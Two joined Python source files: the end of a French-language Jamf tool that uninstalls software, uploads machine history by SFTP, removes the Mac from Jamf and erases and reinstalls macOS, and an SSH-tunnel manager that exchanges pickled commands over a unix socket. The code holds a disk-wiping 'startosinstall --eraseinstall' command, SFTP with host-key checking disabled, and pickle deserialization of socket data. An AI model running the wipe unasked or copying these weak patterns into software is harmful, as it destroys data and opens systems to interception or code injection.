    try:
        # e.g. "10.14.6" -> "14.6": only the part after the "10." major
        # prefix is compared against the bundled version.plist contents.
        version_suffix = recommended_version[3:]
        with open(plist_path, "r") as plist_file:
            plist_content = plist_file.read()
        if version_suffix in plist_content:
            log.info("Installeur local compatible dรฉtectรฉ")
            return "install macOS Mojave"
        log.info("Installeur local dรฉtectรฉ mais version non compatible avec les recommandations Jamf : {}".format(recommended_version))
        return False
    except IOError:
        log.warning("Aucun installeur macOS local trouvรฉ dans /Applications")
        return False
    except Exception as e:
        log.error("Erreur inconnue dans search_local_installers : {}".format(e))
        return False
def list_policies(headers, auth, match):
    '''List all the available policies in Jamf and keep only the relevant ones.

    Returns the names of policies containing `match`; returns [] on error so
    callers can safely take len() of the result.
    '''
    try:
        url = jamf['url_jamf'] + '/JSSResource/policies'
        response = requests.get(url, headers=headers, auth=(auth['api_user'], auth['api_pass']))
        policies = []
        log.info('Sรฉlection des policies Jamf dont le nom contient : "{}"'.format(match))
        for policy in response.json()['policies']:
            if match in policy["name"]:
                policies.append(policy["name"])
        return policies
    except Exception as e:
        # BUG FIX: the message misspelled the function name ("lisst_policies")
        # and the handler fell through returning an implicit None, which made
        # callers crash on len(None).
        log.error("Erreur inconnue dans list_policies : {}".format(e))
        return []
def get_policy_details(headers, auth, policy):
    '''Get the event trigger for a designated policy'''
    # Percent-encode spaces so the policy name is usable in the URL path.
    encoded_name = policy.replace(' ', '%20')
    url = jamf['url_jamf'] + '/JSSResource/policies/name/{}'.format(encoded_name)
    response = requests.get(url, headers=headers, auth=(auth['api_user'], auth['api_pass']))
    return response.json()
def get_computer_history(headers, auth, id):
    '''Get a full jamf history of this Mac.

    Returns the decoded JSON history, or None on any failure.
    '''
    try:
        endpoint = '{}/JSSResource/computerhistory/id/{}'.format(jamf['url_jamf'], id)
        return requests.get(endpoint, headers=headers, auth=(auth['api_user'], auth['api_pass'])).json()
    except Exception as e:
        log.error("Erreur pendant la rรฉcupรฉration de l'historique Jamf ! Raison : {}".format(e))
        return None
def json_to_csv(json_file, serial, name):
    '''Export a JSON object to a file.

    NOTE(review): despite the name, this writes JSON (not CSV) to /tmp and
    returns the file path, or None on failure.
    '''
    try:
        stamp = time.strftime('%y%m%d-%H%M%S')
        file_path = '/tmp/{}_history_{}_{}.json'.format(stamp, serial, name)
        with open(file_path, 'w') as json_output:
            json.dump(json_file, json_output)
        return file_path
    except Exception as e:
        log.error('Erreur pendant la crรฉation du fichier JSON local ! Raison : {}'.format(e), exc_info=True)
        return None
def sftp_upload(file_to_upload):
    """Upload the given file to the configured SFTP drop.

    Returns True on success, False on connection or upload failure.
    """
    try:
        address_and_port = jamf['sftp_address'].split(':')
        address = address_and_port[0]
        port = address_and_port[1]
        user_and_pswd = jamf['sftp_credentials'].split(':')
        user = user_and_pswd[0]
        pswd = user_and_pswd[1]
        cnopts = pysftp.CnOpts()
        # NOTE(review): hostkeys=None disables host-key verification
        # (MITM risk) -- kept as-is, but worth revisiting.
        cnopts.hostkeys = None
        cnopts.log = True
        srv = pysftp.Connection(
            host=address,
            username=user,
            password=pswd,
            port=int(port),
            cnopts=cnopts
        )
        log.info('Connection rรฉussie avec {}'.format(jamf['sftp_address']))
    except Exception as e:
        log.error("Erreur pendant la connexion avec {} - raison : {}".format(jamf['sftp_address'], e))
        return False
    try:
        with srv.cd(sftp_root):
            srv.put(file_to_upload)
    except Exception as e:
        log.error("Erreur pendant l'upload du fichier {} - raison : {}".format(file_to_upload, e), exc_info=True)
        # BUG FIX: previously fell through and returned an implicit None here.
        return False
    else:
        return True
    finally:
        # BUG FIX: the SFTP connection was never closed (leaked one socket
        # per upload attempt).
        srv.close()
def upload_history(headers, auth, comp_id, serial, name):
    '''Function to upload a history toward a SFTP server.

    Fetch the Jamf history, dump it to a local JSON file and upload it;
    True only when every step succeeds.
    '''
    log.info("Rรฉcupรฉration de l'historique depuis la base de donnรฉes Jamf")
    history = get_computer_history(headers, auth, comp_id)
    if history is None:
        return False
    log.info("Conversion de l'historique JSON en fichier JSON local")
    file_to_upload = json_to_csv(history, serial, name)
    if file_to_upload is None:
        return False
    log.info("Fichier {} crรฉรฉ, dรฉmarrage de l'upload SFTP...".format(file_to_upload))
    if sftp_upload(file_to_upload) is not True:
        return False
    log.info("Historique Jamf uploadรฉ avec succรจs vers {}".format(jamf['sftp_address']))
    return True
def delete_computer(computer_id, auth):
    '''Delete the given computer from Jamf.

    Returns True when the server answers 200, False otherwise.
    '''
    url = jamf['url_jamf'] + '/JSSResource/computers/id/{}'.format(computer_id)
    response = requests.delete(url, auth=(auth['api_user'], auth['api_pass']))
    # BUG FIX: success used to be detected by comparing str(response) against
    # the literal '<Response [200]>' repr; check the status code instead.
    if response.status_code == 200:
        return True
    log.error("Echec de la suppression de la DB Jamf ! Rรฉponse du serveur : {}".format(response))
    return False
def launch_reset(app):
    '''Launch the reset command (startosinstall --eraseinstall).'''
    # Escape spaces in the app name so it survives the shell invocation.
    escaped_app = app.replace(' ', '\\ ')
    cmd = r'/Applications/{}.app/Contents/Resources/startosinstall --eraseinstall --newvolumename "Macintosh HD" --nointeraction --agreetolicense >> {}'.format(escaped_app, logs_file)
    log.info('Running command : {}'.format(cmd))
    subprocess.call(cmd, shell=True)
    return True
def jamf_cmd(cmd):
    '''Launch a custom Jamf command; True on exit code 0, False otherwise.'''
    try:
        # The jamf binary takes space-separated arguments; log messages below
        # intentionally show the split list, matching historical log output.
        cmd = cmd.split(' ')
        proc = subprocess.Popen(['/usr/local/bin/jamf'] + cmd,
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, err = proc.communicate()
        if proc.returncode != 0:
            raise Exception(err)
        log.info("Commande JAMF '{}' exรฉcutรฉe. Rรฉsultat : {}".format(cmd, out))
        return True
    except Exception as e:
        log.error("Erreur : pendant l'exรฉcution de la commande JAMF '{}' : {}".format(cmd, e))
        return False
def show_logs(event=None):
    '''Launch a shell command to open log Console on the specified logfile'''
    # `event` is unused but accepted so this can double as a Tk event callback.
    subprocess.call("open -a Console {}".format(logs_file), shell=True)
def show_jamfhelper():
    """Show a full-screen jamfHelper splash screen announcing the reboot."""
    # Splash Screen Jamf Helper variables
    jamfHelper = "/Library/Application Support/JAMF/bin/jamfHelper.app/Contents/MacOS/jamfHelper"
    heading = "Redรฉmarrage en cours"
    description = "Veuillez patienter, votre Mac va redรฉmarrer dans quelques instants..."
    icon = "/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/NetBootVolume.icns"
    # Launch Splash Screen (fire-and-forget: the machine reboots shortly after)
    subprocess.Popen('"{}" -windowType fs -heading "{}" -description "{}" -icon "{}" &'.format(jamfHelper, heading, description, icon), shell=True)
###########################################################################
### This is the main class
###########################################################################
class JamfOneClickReinstall():
    ''' This class runs the main window of the application '''
    def __init__(self, root):
        # Jamf API headers
        self.json_headers = {
            'Accept':'application/json'
        }
        # Checkin computer serial number
        self.my_serial = get_serial()
        if self.my_serial is None:
            log.error("Erreur : impossible de dรฉterminer le numรฉro de sรฉrie de ce Mac !")
            sys.exit(1)
        # Initializing root window
        root.title_font = tkfont.Font(family='Helvetica', size=18, weight="bold")
        root.title(title + ', ' + version)
        root.resizable(False, False)
        root.tk_setPalette(background='#ececec')
        width = 900
        height = 400
        x = int(root.winfo_screenwidth() / 2 - width / 2)
        y = int(root.winfo_screenheight() / 2 - height / 2)
        root.geometry("{}x{}+{}+{}".format(width, height, x, y))
        # NOTE(review): the <Return> binding passes the Tk event object as the
        # `autologon` argument of connect(); it is never 'oui', so the manual
        # login path is taken -- works, but only by accident. TODO confirm.
        root.bind("<Return>", self.connect)
        # Creating the container frame
        self.container = tk.Frame(master=root)
        self.container.pack(side="top", fill="both", expand=True)
        self.container.grid_rowconfigure(0, weight=1)
        self.container.grid_columnconfigure(0, weight=1)
        # Launching first frame
        self.frame()
        # Displaying credentials frame or using autologon
        if jamf['autologon'].lower() == 'oui':
            self.connect(autologon='oui')
        else:
            self.user_login_frame()
    #############################################
    ### Class tools
    #############################################
    def info(self, title, msg):
        '''Display an info popup and logs to file'''
        log.info(msg)
        tkMessageBox.showinfo(title, msg)
        root.update()
    def error(self, title, msg):
        '''Display an error popup and logs to file'''
        # NOTE(review): uses showinfo rather than showerror; kept as-is so the
        # dialog appearance does not change.
        log.error(msg)
        tkMessageBox.showinfo(title, msg)
        root.update()
    # BUG FIX: a first, dead `def connect(self, event=None)` definition used to
    # sit here and was immediately shadowed by the definition below (Python
    # keeps only the last method of a given name); the dead copy is removed.
    def connect(self, autologon=None, event=None):
        '''Try to connect to Jamf api server by listing all buildings in jamf. If succeed : connect is OK'''
        try:
            if autologon == 'oui':
                self.auth = {
                    'api_user':jamf['api_user'],
                    'api_pass':jamf['api_pswd']
                }
            else:
                self.auth = {
                    'api_user':self.log_user.get(),
                    'api_pass':self.log_pswd.get()
                }
            list_buildings(self.json_headers, self.auth)
        except ValueError:
            self.error("Erreur de connexion", "Identifiants invalides ou non autorisรฉs...")
            root.update()
        except requests.ConnectionError:
            self.error("Erreur de connexion", "Serveur Jamf injoignable, veuillez vรฉrifier votre accรจs rรฉseau...")
            root.update()
        except Exception as e:
            self.error("Erreur de connexion", "Impossible de lancer la connexion au serveur Jamf.\nRaison : {}".format(e))
            root.update()
        else:
            log.info("Identifiant API Jamf '{}' connectรฉ".format(self.auth['api_user']))
            try:
                self.login_frame.destroy()
            except:
                pass
            self.wait = tk.Label(self.main_frame, text='Veuillez patienter...', font='System 50 bold')
            root.update()
            self.wait.pack(fill='both', anchor='center', pady=100)
            root.after(500, self.get_jamf_info)
    def get_jamf_info(self):
        '''Search for this computer in Jamf'''
        try:
            match = False
            for computer in list_computers(self.json_headers, self.auth):
                comp = computer_detail(computer['id'], self.json_headers, self.auth)
                if comp['general']['serial_number'] == self.my_serial:
                    log.info("Ce Mac a รฉtรฉ identifiรฉ dans jamf, {} avec l'ID {}".format(comp['general']['name'].encode("utf-8"), comp['general']['id']))
                    self.my_mac = comp
                    self.my_id = comp['general']['id']
                    self.my_name = comp['general']['name']
                    match = True
                    break
            if match is True:
                self.wait.destroy()
                self.show_config_frame()
            else:
                self.error('Erreur Jamf', "Aucun lien entre le numรฉro de sรฉrie de ce Mac et la base de donnรฉes Jamf !\nL'application va quitter...")
                sys.exit(1)
        except Exception as e:
            root.update()
            text = "Une erreur a empรชchรฉ la rรฉcupรฉration des informations Jamf.\nVeuillez tenter de rafraichir les champs manuellement ou contacter le support IP Echanges\n\nRaison : {}".format(e)
            confirm = tkMessageBox.askokcancel("Erreur Jamf", text)
            if confirm is True:
                root.after(1000, self.get_jamf_info)
    def resync(self):
        '''Update the fields with a Jamf poll'''
        for frame in [self.reset_title_frame, self.reset_frame, self.reset_button_frame]:
            try:
                frame.destroy()
            except:
                pass
        self.wait = tk.Label(self.main_frame, text='Veuillez patienter...', font='System 50 bold')
        self.wait.pack(fill='both', anchor='center', pady=50)
        root.after(500, self.get_jamf_info)
    #############################################
    ### Frames
    #############################################
    def frame(self):
        '''This frame is the main canva with different sub-frames inside'''
        # Main title frame
        header_frame = tk.Frame(self.container, bg='#1E1E1E')
        header_frame.pack(fill='both', anchor='n')
        tk.Label(header_frame, text=title, font='System 30 bold', fg='#fff', bg='#1E1E1E').pack(side='left', pady=(27, 5))
        tk.Label(header_frame, text=version, font='System 18 bold', fg='#fff', bg='#1E1E1E').pack(side='left', padx=10, pady=(37, 5))
        # Central frame, swapped out as the workflow progresses
        self.main_frame = tk.Frame(self.container, bg='#ECECEC')
        self.main_frame.pack(fill='both', anchor='n', expand='yes')
        # Frame holding the log-display button
        log_frame = tk.Frame(self.container, bg='white')
        log_frame.pack(fill='both', side='bottom')
        tk.Label(log_frame, text='Emplacement des logs : {}'.format(logs_file), font='System 12 italic', bg='white').pack(side='left', padx=8, pady=8)
        tk.Button(log_frame, text='Afficher la console de logs', command=show_logs, highlightbackground='white').pack(side='right', padx=8, pady=8)
    def user_login_frame(self):
        '''Create a login frame to prevent everyone to use the application'''
        self.login_frame = tk.Label(self.main_frame)
        self.login_frame.pack(fill='both', side='top')
        # Title
        tk.Label(self.login_frame, text='Authentification nรฉcessaire', font='System 16 bold').grid(row=0, column=0, sticky='w', pady=(5, 0))
        # Login and password fields
        self.log_user = tk.StringVar()
        tk.Label(self.login_frame, text='Login :').grid(row=1, column=0, sticky='w', padx=(180,10), pady=(60, 0))
        e1 = tk.Entry(self.login_frame, textvar=self.log_user, background='white', width=45)
        e1.grid(row=1, column=1, sticky='w', pady=(60, 0))
        e1.focus()
        self.log_pswd = tk.StringVar()
        tk.Label(self.login_frame, text='Mot de passe :').grid(row=2, column=0, sticky='w', padx=(180,10), pady=(3, 0))
        tk.Entry(self.login_frame, textvar=self.log_pswd, background='white', show='*', width=45).grid(row=2, column=1, sticky='w', pady=(3, 0))
        # Buttons
        tk.Button(self.login_frame, text='Quitter', command=root.destroy).grid(row=3, column=0, sticky='ew', padx=(180,10), pady=(3, 0))
        tk.Button(self.login_frame, text='Connexion', command=self.connect).grid(row=3, column=1, sticky='ew', pady=(3, 0))
    def show_config_frame(self):
        '''This frame displays the main configuration fields'''
        # MacOS reset title
        self.reset_title_frame = tk.Frame(self.main_frame)
        self.reset_title_frame.pack(fill='both', side='top')
        self.reset_title = tk.Label(self.reset_title_frame, text="Rรฉinitialisation complรจte de MacOS", font='System 16 bold')
        self.reset_title.pack(side='left', padx=5, pady=5)
        # MacOS reset frame
        self.reset_frame = tk.Frame(self.main_frame)
        self.reset_frame.pack(fill='both', side='top', padx=5)
        # MacOS Installer Choice: prefer a compatible local installer, fall
        # back to the remote Jamf policies otherwise.
        text = tk.Label(self.reset_frame, text="Version macOS ร  rรฉinstaller ({} recommandรฉ) :".format(jamf["macos_last_version"]))
        text.grid(row=2, column=0, sticky='w', padx=10, pady=(30, 0))
        installers = search_local_installer(jamf['macos_last_version'])
        if installers is False:
            self.install_type = 'remote'
            log.info("Recherche d'installeurs distants dans la DB Jamf")
            installers = list_policies(self.json_headers, self.auth, jamf['policy_match_name'])
            if len(installers) == 0:
                self.error("Erreur", "Aucun installeur MacOS trouvรฉ dans la DB Jamf !")
                self.resync()
        else:
            installers = [installers]
            self.install_type = 'local'
        self.installer = tk.StringVar()
        self.installer.set(installers[0])
        tk.OptionMenu(self.reset_frame, self.installer, *installers).grid(row=2, column=1, sticky='ew', pady=(30, 0))
        # Buttons
        self.reset_button_frame = tk.Frame(self.main_frame)
        self.reset_button_frame.pack(fill='both', side='top')
        tk.Button(self.reset_button_frame, text='Lancer la rรฉinstallation', command=self.reset_computer).pack(fill='x', expand='yes', side='right', padx=5, pady=10)
        tk.Button(self.reset_button_frame, text='Annuler et quitter', command=root.destroy).pack(fill='x', expand='yes', side='right', padx=(5, 0), pady=10)
    def reset_computer(self):
        '''Delete the computer from Jamf DB and reinstall it from scratch'''
        try:
            confirm = tkMessageBox.askokcancel("Confirmation nรฉcessaire", "Vous รชtes sur le point de totalement rรฉinstaller votre Mac.\nVoulez-vous continuer ?")
            if confirm is not True:
                log.info("Rรฉinstallation annulรฉe par l'utilisateur, redรฉmarrage de l'application...")
                self.resync()
                return
            else:
                # Destroy the previous frames and create a new one with steps states
                self.reset_button_frame.destroy()
                self.reset_frame.destroy()
                self.reset_frame = tk.Frame(self.main_frame)
                self.reset_frame.pack(fill='both', side='top', padx=5)
                list_steps = [
                    ["check_download", "Tรฉlรฉchargement de l'installeur MacOS en attente..."],
                    ["check_del_adobe", 'Dรฉsactivation de la suite Adobe CC2019 en attente...'],
                    ["check_del_eset", "Suppression de l'antivirus ESET en attente..."],
                    ["check_upload_history", "Sauvegarde des infos Jamf vers SFTP en attente..."],
                    ["check_del_computer", 'Suppression de la base Jamf en attente...'],
                    ["check_launch_reset", "Rรฉinitialisation de l'ordinateur en attente..."],
                    ["check_reboot", ""]
                ]
                step = {}
                i = 0
                for each_step in list_steps:
                    step[each_step[0]] = tk.Label(self.reset_frame, text=each_step[1])
                    step[each_step[0]].grid(row=i, column=0, sticky='w', padx=100, pady=(3, 0))
                    i += 1
                root.update()
                ### Launch the steps
                # If installer is 'remote', download it from Jamf. Else launch directly the reinstall
                if self.install_type == 'remote':
                    try:
                        chosen_policy = get_policy_details(self.json_headers, self.auth, self.installer.get())
                        trigger = chosen_policy['policy']['general']['trigger_other']
                        log.info("Tรฉlรฉchargement de l'installeur MacOS en cours, veuillez patienter...")
                        step['check_download'].configure(text="Tรฉlรฉchargement de l'installeur MacOS en cours...", fg="blue")
                        root.update()
                        if jamf_cmd('policy -event {}'.format(trigger)) is True:
                            log.info("Tรฉlรฉchargement terminรฉ")
                            package_name = search_local_installer(jamf['macos_last_version'])
                            if package_name is not False:
                                step['check_download'].configure(text="Tรฉlรฉchargement terminรฉ et validรฉ", fg="green")
                            else:
                                raise Exception("Le paquet tรฉlรฉchargรฉ n'a pas รฉtรฉ trouvรฉ dans la liste des applications")
                        else:
                            raise Exception("La commande Jamf de tรฉlรฉchargement du paquet a terminรฉ en erreur")
                    except Exception as e:
                        log.error("Erreur pendant le tรฉlรฉchargement : {}".format(e), exc_info=True)
                        step['check_download'].configure(text="Tรฉlรฉchargement en erreur !", fg="red")
                        self.error("Erreur", "Une erreur a empรชchรฉ le tรฉlรฉchargement de l'installeur MacOS ! Annulation...")
                        self.resync()
                        return
                else:
                    package_name = self.installer.get()
                    step['check_download'].configure(text="Installeur local sรฉlectionnรฉ", fg="green")
                root.update()
                # Remove all adobe CC2019 apps with jamf policy
                if os.path.exists('/Applications/Adobe Premiere Pro CC 2019/Adobe Premiere Pro CC 2019.app/Contents/Info.plist'):
                    if jamf_cmd('policy -event uninstall_adobe') is True:
                        log.info("Applications Adobe supprimรฉes avec succรจs")
                        step['check_del_adobe'].configure(text="Dรฉsactivation de la suite Adobe CC2019 : OK", fg="green")
                    else:
                        step['check_del_adobe'].configure(text="Dรฉsactivation de la suite Adobe CC2019 : Erreur", fg="red")
                        log.error("Une erreur a empรชchรฉ la suppression des applications Adobe !")
                else:
                    step['check_del_adobe'].configure(text="Dรฉsactivation de la suite Adobe CC2019 : Non installรฉ", fg="green")
                    log.error("Adobe CC2019 n'existe pas sur cette machine")
                root.update()
                # Remove ESET antivirus app with jamf policy
                if jamf_cmd('policy -event uninstall_eset') is True:
                    log.info("Application antivirus ESET supprimรฉe avec succรจs")
                    step['check_del_eset'].configure(text="Suppression de l'antivirus ESET : OK", fg="green")
                else:
                    step['check_del_eset'].configure(text="Suppression de l'antivirus ESET : Erreur", fg="red")
                    log.error("Une erreur a empรชchรฉ la suppression de l'application antivirus ESET !")
                root.update()
                # Upload the computer history to our SFTP server
                if upload_history(self.json_headers, self.auth, self.my_id, self.my_serial, self.my_name) is True:
                    step['check_upload_history'].configure(text="Sauvegarde des infos Jamf vers SFTP : OK", fg="green")
                else:
                    step['check_upload_history'].configure(text="Sauvegarde des infos Jamf vers SFTP : Erreur", fg="red")
                    log.error("Une erreur a empรชchรฉ la sauvegarde des infos Jamf vers FTP !")
                root.update()
                # Delete this computer from the Jamf DB to prevent conflicts
                if delete_computer(self.my_id, self.auth) is True:
                    log.info("Mac supprimรฉ de la base donnรฉes Jamf avec succรจs")
                    step['check_del_computer'].configure(text="Suppression de la base Jamf : OK", fg="green")
                    root.update()
                else:
                    step['check_del_computer'].configure(text="Suppression de la base Jamf : Erreur", fg="red")
                    self.error("Erreur", "Une erreur a empรชchรฉ la suppression du Mac de la DB Jamf ! Merci de contacter le support IP-Echanges")
                    self.resync()
                    return
                # Launch the reinstall command
                try:
                    reset_command = threading.Thread(target=launch_reset, args=(package_name,))
                    reset_command.start()
                    step['check_launch_reset'].configure(text="Lancement de la rรฉinstallation : OK", fg="green")
                    step['check_reboot'].configure(text="Redรฉmarrage en cours, veuillez patientier...", fg="blue")
                    root.update()
                    log.info("La procรฉdure de rรฉinstallation est lancรฉe, cliquez sur OK pour autoriser le redรฉmarrage.")
                    show_jamfhelper()
                except Exception as e:
                    log.error("Erreur pendant la rรฉinstallation : {}".format(e))
                    step['check_launch_reset'].configure(text="Lancement de la rรฉinstallation : Erreur", fg="red")
                    root.update()
                    text = "Attention !\nLa commande de rรฉinitialisation ne s'est pas effectuรฉe correctement ! Merci de contacter le support IP-Echanges"
                    self.error("Erreur pendant la rรฉinitialisation", text)
                    self.resync()
                    return
        except Exception as e:
            log.error("Erreur dans la fonction reset_computer : {}".format(e), exc_info=True)
            self.resync()
            return
###########################################################################
### Start the main application
###########################################################################
if __name__ == '__main__':
    log.info('--- Lancement de {}, {} ---'.format(title, version))
    # Import downloaded libraries -- each is mandatory; abort with a logged
    # message if any is missing.
    try:
        import requests
    except Exception as e:
        log.error("*** Erreur *** Impossible d'importer la librairie Python requests.\nContacter le support IP-Echanges.\n\nRaison : {}".format(e))
        sys.exit(1)
    try:
        import AppKit
    except Exception as e:
        log.error("*** Erreur *** Impossible d'importer la librairie Python AppKit.\nContacter le support IP-Echanges.\n\nRaison : {}".format(e))
        sys.exit(1)
    try:
        import pysftp
    except Exception as e:
        log.error("*** Attention *** Impossible d'importer la librairie Python pysftp.\nCeci empรชchera le script de crรฉer une sauvegarde vers un serveur SFTP distant.\n\nRaison : {}".format(e))
        sys.exit(1)
    # Import caffeine and prevent mac from sleeping (best-effort: a warning
    # is logged but the app still runs without it)
    try:
        import caffeine
        caffeine.on(display=True)
        log.info("Module Caffeine activรฉ, mise en veille interdite")
    except:
        log.warning("Impossible d'activer le module caffeine, le Mac risque de passer en mode veille en cours d'installation")
    # Defining main API variables
    try:
        # Defining variables from Jamf -- when launched by a Jamf policy,
        # script parameters start at argv[4] (argv[1..3] are reserved).
        jamf = {
            'url_jamf':sys.argv[4],
            'policy_match_name':sys.argv[5],
            'sftp_address':sys.argv[6],
            'sftp_credentials':sys.argv[7],
            'macos_last_version':sys.argv[8],
            'autologon':sys.argv[9],
            'api_user':sys.argv[10],
            'api_pswd':sys.argv[11],
        }
        log.info('Using jamf arguments as main variables')
    except:
        # Jamf testing parameters (placeholders used when run by hand)
        jamf = {
            'url_jamf':"YOUR_JAMF_URL",
            'policy_match_name':"YOUR_CUSTOM_TRIGGER",
            'sftp_address':'YOUR_SFTP_ADDRESS:PORT',
            'sftp_credentials':'USERNAME:PASSWORD',
            'macos_last_version':'10.14.6',
            'autologon':'non',
            'api_user':'USERNAME',
            'api_pswd':'PASSWORD',
        }
        log.info('Using test parameters as main variables')
    # Common variables: remote directory used by sftp_upload
    sftp_root = '/'
    # Kill Self Service app so it does not interfere with the reinstall UI
    os.system('killall "Self Service"')
    # Launch Tkinter app and bring it to the foreground
    root = tk.Tk()
    app = JamfOneClickReinstall(root)
    AppKit.NSApplication.sharedApplication().activateIgnoringOtherApps_(True)
    root.mainloop()
|
server.py | import os
import subprocess
import shutil
import queue
import socket
import struct
import pickle
import tempfile
import threading
import logging
from select import select
from os.path import dirname, basename
from conduit_client import ssh
PYTHON = shutil.which('python3')
MODULE_PATH = dirname(dirname(__file__))
MODULE_NAME = basename(dirname(__file__))
LOGGER = logging.getLogger()
LOGGER.addHandler(logging.NullHandler())
def _set_if_not_none(d, key, value):
value = value if value is not None else os.getenv(key)
if value is None:
return
d[key] = str(value)
class Command:
    """A picklable control message exchanged over a stream socket.

    Wire format: a 2-byte native-endian unsigned short holding the
    payload length, followed by the pickled Command instance.
    """

    COMMAND_NOOP = 0
    COMMAND_DEL = 1
    COMMAND_ADD = 2
    COMMAND_STOP = 3
    COMMAND_LIST = 4

    COMMANDS = {
        COMMAND_NOOP: 'noop',
        COMMAND_DEL: 'del',
        COMMAND_ADD: 'add',
        COMMAND_STOP: 'stop',
        COMMAND_LIST: 'list',
    }

    def __init__(self, command):
        self.command = command

    def __str__(self):
        return f'{self.__class__.__name__}: command={self.name}'

    @property
    def name(self):
        # Human-readable name for the numeric command code.
        return self.COMMANDS[self.command]

    @staticmethod
    def _recv_exact(s, size):
        """Read exactly *size* bytes from socket *s*.

        recv() may legally return fewer bytes than requested; the
        original code assumed a single recv() would return the whole
        header/payload, which breaks on short reads. Raises EOFError
        when the peer closes the connection mid-message.
        """
        chunks = []
        remaining = size
        while remaining:
            data = s.recv(remaining)
            if not data:
                raise EOFError()
            chunks.append(data)
            remaining -= len(data)
        return b''.join(chunks)

    @staticmethod
    def unpack(s, timeout=None):
        """Read one Command from socket *s*.

        # Raises
            TimeoutError: if *timeout* is given and nothing is readable.
            EOFError: when the peer has closed the connection.
        """
        if timeout:
            r = select([s], [], [], timeout)[0]
            if s not in r:
                raise TimeoutError('Socket not readable')
        size = struct.unpack('H', Command._recv_exact(s, 2))[0]
        return pickle.loads(Command._recv_exact(s, size))

    def pack(self):
        # Serialize as <2-byte length><pickle payload>.
        data = pickle.dumps(self)
        return struct.pack('H', len(data)) + data

    def send(self, s):
        s.send(self.pack())

    def apply(self, manager, server):
        # Base commands have no effect; subclasses override.
        pass
class DomainCommand(Command):
    """A Command scoped to one named domain, with an argument payload."""

    def __init__(self, command, domain, arguments):
        self.domain = domain
        self.arguments = arguments
        super().__init__(command)
class ListCommand(Command):
    """Reply with one ADD TunnelCommand per tunnel the manager knows."""

    def apply(self, manager, socket):
        tunnels = manager.list_tunnels()
        for tunnel in tunnels:
            reply = TunnelCommand(Command.COMMAND_ADD, tunnel)
            reply.send(socket)
class TunnelCommand(Command):
    """Carry a tunnel to be added to or removed from the SSH manager."""

    def __init__(self, command, tunnel):
        super().__init__(command)
        self.tunnel = tunnel

    def apply(self, manager, socket):
        # Dispatch on the command code; any other code is a no-op.
        if self.command == Command.COMMAND_DEL:
            manager.del_tunnel(self.tunnel)
        elif self.command == Command.COMMAND_ADD:
            manager.add_tunnel(self.tunnel)
class SSHManagerServer:
    """Server side of the tunnel-manager IPC.

    Connects back to the client's unix socket, reads pickled Commands on
    a background thread, and applies tunnel commands from the main loop
    in run_forever().
    """

    def __init__(self, sock_name):
        # sock_name: filesystem path of the unix socket the client
        # process is listening on.
        self._sock_name = sock_name
        self._queue = queue.Queue()
        self._manager = ssh.create_manager()
        self._socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        # Daemon thread: reads commands and feeds self._queue.
        self._reader = threading.Thread(target=self._read, daemon=True)
        self._reader.start()

    def _read(self):
        """Reader-thread loop.

        Every received command is acknowledged with a NOOP. LIST is
        answered inline (tunnels, then a NOOP terminator); STOP ends the
        thread; everything else is queued for run_forever().
        """
        noop = Command(Command.COMMAND_NOOP)
        try:
            self._socket.connect(self._sock_name)
            while True:
                try:
                    cmd = Command.unpack(self._socket)
                except EOFError:
                    # Peer closed the connection: shut the reader down.
                    LOGGER.error('EOF encountered, exiting')
                    return
                except Exception:
                    # Malformed message: log and keep reading.
                    LOGGER.exception('Error reading command.')
                    continue
                LOGGER.debug('Received command: %s, acking', cmd)
                if cmd.command == Command.COMMAND_LIST:
                    # Send the tunnel list, then a NOOP as terminator.
                    cmd.apply(self._manager, self._socket)
                    noop.send(self._socket)
                    continue
                elif cmd.command == Command.COMMAND_STOP:
                    LOGGER.info('Exiting')
                    return
                # Ack first, then hand off to run_forever() via the queue.
                noop.send(self._socket)
                self._queue.put(cmd)
        finally:
            self._socket.close()

    def run_forever(self):
        """Main loop: poll the ssh manager and apply queued tunnel
        commands; non-TunnelCommand messages are ignored."""
        while True:
            self._manager.poll()
            try:
                # Timeout so the manager is polled at least every 10s.
                command = self._queue.get(timeout=10.0)
            except queue.Empty:
                continue
            if not isinstance(command, TunnelCommand):
                continue
            try:
                command.apply(self._manager, self._socket)
            except Exception:
                LOGGER.exception('Error handling command')
class SSHManagerClient:
    """Client side of the tunnel-manager IPC.

    Spawns the server module as a child process and exchanges pickled
    Commands with it over a unix socket.
    """

    def __init__(self, host=None, port=None, user=None, key=None,
                 host_keys=None):
        # SSH settings are forwarded to the child via its environment;
        # unset values fall back to the caller's environment variables.
        self._env = {}
        _set_if_not_none(self._env, 'SSH_HOST', host)
        _set_if_not_none(self._env, 'SSH_PORT', port)
        _set_if_not_none(self._env, 'SSH_USER', user)
        _set_if_not_none(self._env, 'SSH_KEY_FILE', key)
        _set_if_not_none(self._env, 'SSH_HOST_KEYS_FILE', host_keys)
        self._sock_name = None   # path of the unix listening socket
        self._listen = None      # listening socket
        self._socket = None      # accepted connection to the server
        self._server = None      # subprocess.Popen handle
        # Serializes _send_command across threads.
        self._lock = threading.Lock()

    def __del__(self):
        self.close()

    def close(self):
        """Close both sockets; safe to call repeatedly."""
        if self._socket:
            self._socket.close()
            self._socket = None
        if self._listen:
            self._listen.close()
            self._listen = None

    def _start_server(self):
        """Spawn the server child process if it is not already running."""
        if self._server is not None and self._server.poll() is None:
            return
        # NOTE(review): tempfile.mktemp() is race-prone (the path can be
        # claimed between creation and bind) — consider mkdtemp().
        self._sock_name = tempfile.mktemp()
        self._listen = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self._listen.bind(self._sock_name)
        self._listen.listen()
        # NOTE(review): env=self._env REPLACES the inherited environment
        # (no PATH etc. reach the child) — confirm this is intended.
        self._server = subprocess.Popen(
            [PYTHON, '-m', MODULE_NAME, self._sock_name],
            cwd=MODULE_PATH,
            env=self._env
        )
        # Blocks until the child connects back.
        self._socket, _ = self._listen.accept()

    def disconnect(self, timeout=None):
        """Stop the server child and release all resources."""
        try:
            self._send_command(Command(Command.COMMAND_STOP))
        except EOFError:
            # Server already gone; still clean up below.
            pass
        self.close()
        os.remove(self._sock_name)
        self._server.kill()
        self._server = None

    def _send_command(self, cmd):
        """Send *cmd* and collect reply Commands until a NOOP arrives.

        # Returns
            List of reply Commands (may be empty).
        """
        reply = []
        # NOTE(review): the acquire() result is ignored — on timeout the
        # command proceeds unlocked and release() would raise. Confirm.
        self._lock.acquire(timeout=1.0)
        try:
            self._start_server()
            cmd.send(self._socket)
